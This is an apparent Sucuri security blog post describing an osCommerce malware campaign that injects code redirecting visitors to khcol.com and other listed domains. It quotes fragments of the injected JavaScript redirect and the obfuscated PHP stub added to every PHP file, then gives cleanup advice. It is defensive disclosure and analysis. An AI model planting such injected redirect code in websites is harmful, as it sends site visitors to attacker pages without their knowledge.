Continuing attacks against osCommerce: khcol.com

Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to http://khcol.com. This is how it looks like in an infected site:

<script type="text/javascript">document.location = "http://khcol.com/page/?ref=aHR0cDovL2FtZXJ…..tL2FkbWluLw=="

This javascript is generated by the following code added to the bottom of all PHP files in the server:

<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode(‘a2hjb2wuY29t’);$tf['u']=’http://’.$tf['s']…


We recommend that every osCommerce user check their sites and to take the proper steps to secure them (especially if using v2.2). The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our malware scanner to verify if a site is infected. If it is, we can take care of it for you.

Update 1: Google already blacklisted more than 1 thousand sites because of this malware. We have identified a lot more already, so this number should grow very soon.

Update 2: Other domains being used in this attack: solomon-xl.cz.cc, thescannerantiv.com, searchableantiv.com, www1.checker-network-hard.cz.cc and many others.

We will post more details as we track this malware.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.